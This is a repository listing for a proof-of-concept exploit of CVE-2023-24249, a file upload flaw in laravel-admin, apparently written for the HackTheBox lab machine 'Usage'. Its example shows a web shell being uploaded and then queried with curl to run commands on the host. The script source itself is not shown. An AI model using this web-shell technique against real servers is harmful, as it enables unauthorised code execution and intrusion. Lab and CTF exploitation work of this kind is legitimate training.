CVE-2023-24249 PoC — laravel-admin code issue vulnerability

Source
Associated Vulnerability
Title: laravel-admin code issue vulnerability (CVE-2023-24249)
Description: An arbitrary file upload vulnerability in laravel-admin v1.8.19 allows attackers to execute arbitrary code via a crafted PHP file.
Description
Proof of concept for HTB easy machine Usage
Readme
# CVE-2023-24249 PoC
[CVE-2023-24249](https://nvd.nist.gov/vuln/detail/CVE-2023-24249) is an arbitrary file upload vulnerability in laravel-admin v1.8.19. This proof of concept exploits the vulnerability to upload a web shell.

The exploit was written for use against the HackTheBox easy machine [Usage](https://app.hackthebox.com/machines/Usage).

# Example
```
python3 CVE-2023-24249.py
[+] Web shell uploaded to http://admin.usage.htb/uploads/images/df18111ffa9f40264b52624c7d7d21b1.php

curl http://admin.usage.htb/uploads/images/df18111ffa9f40264b52624c7d7d21b1.php?c=id
uid=1000(dash) gid=1000(dash) groups=1000(dash)
```
File Snapshot

```
[4.0K] /data/pocs/7a226f7a9670e41c671fd27d6de3fb05a5ebb7c8
├── [1.0K] CVE-2023-24249.py
└── [ 671] README.md

0 directories, 2 files
```